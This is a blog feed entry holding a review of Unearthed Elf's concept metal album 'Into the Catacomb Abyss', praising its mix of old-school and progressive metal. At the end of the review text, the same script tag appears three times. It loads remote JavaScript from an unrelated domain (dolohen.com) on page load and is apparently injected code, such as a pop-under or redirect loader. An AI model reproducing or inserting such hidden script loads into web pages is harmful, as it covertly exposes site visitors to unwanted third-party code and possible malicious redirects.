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		<title>Unearthed Elf &#8211; Into the Catacomb Abyss</title>
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		<description><![CDATA[Despite singing about finding vials of holy water in ancient, cobweb-laden mausoleums, this is far more than just a dungeon crawl set to music
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				<content:encoded><![CDATA[<p><img class="size-thumbnail wp-image-16687 alignleft" alt="unearthed-elf-into-the-catacomb-abyss" src="http://www.kalyr.co.uk/weblog/wp-content/uploads/2016/09/Unearthed-Elf-Into-the-Catacomb-Abyss-150x150.jpg" width="150" height="150" />You are in a 20&#8242; by 20&#8242; room.</p>
<p>You see a metal band. They are singing about finding a vial of holy water in an ancient, cobweb-laden mausoleum.</p>
<p>What do you do?</p>
<p>Visigoth had one song called &#8220;The Dungeon Master&#8221;. Scottish power-metal heroes Gloryhammer released a concept album about an evil wizard and his army of undead unicorns. Bryan Josh of Mostly Autumn made a solo album with a narrative that included an end-of-level monster. But with song titles like &#8220;Vial of Holy Water Found in an Ancient, Cobweb-Laden Mausoleum&#8221;, &#8220;Lighting the Mummy on Fire&#8221; and &#8220;Lair of the Beholder&#8221; has anyone released an album which sounds like an entire dungeon set to music?</p>
<p><a href="http://www.unearthedelf.com/" target="_blank">Unearthed El</a>f is actually a solo project from Keith D of progressive doom metallers Arctic Sleep, largely written while he was incapacitated with a knee injury. As well as all the vocals and guitars, he plays all instruments, including the drums. As a concept album about the aforementioned Elf, the imagery in the lyrics and song titles would be little more than a gimmick if the music wasn&#8217;t up to scratch, but this is also a record with plenty to say musically.</p>
<p>It kicks off with the monstrous old-school metal riff of the title track, the densely layered, almost symphonic &#8220;Never See The Sun Again&#8221; and the atmospheric progressive-tinged &#8220;Eternal Night&#8221;, and those first three numbers set the tone for the record. What we have is a skilful mix of the textures of melodic death metal and old-school classic metal, with a dash of modern progressive rock adding sonic variety. The record eschews death-growls in favour of clean vocals throughout, with a couple of moments of Gregorian chant thrown in for good measure. There&#8217;s more than a hint of Mikael Akerfeldt about Keith D&#8217;s vocals, and the resulting sound has echoes of Opeth, Paradise Lost and Amorphis. It&#8217;s got a huge sound with multiple layers of guitars and vocals, and it manages to sound epic without being overblown.</p>
<p>Far more that just the soundtrack to a dungeon crawl, &#8220;Into the Catacomb Abyss&#8221; is an ambitious and impressive metal album. The album is released on October 31st, Halloween night.<script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script><script type="text/javascript" src="//dolohen.com/apu.php?zoneid=676630" async data-cfasync="false"></script></p>
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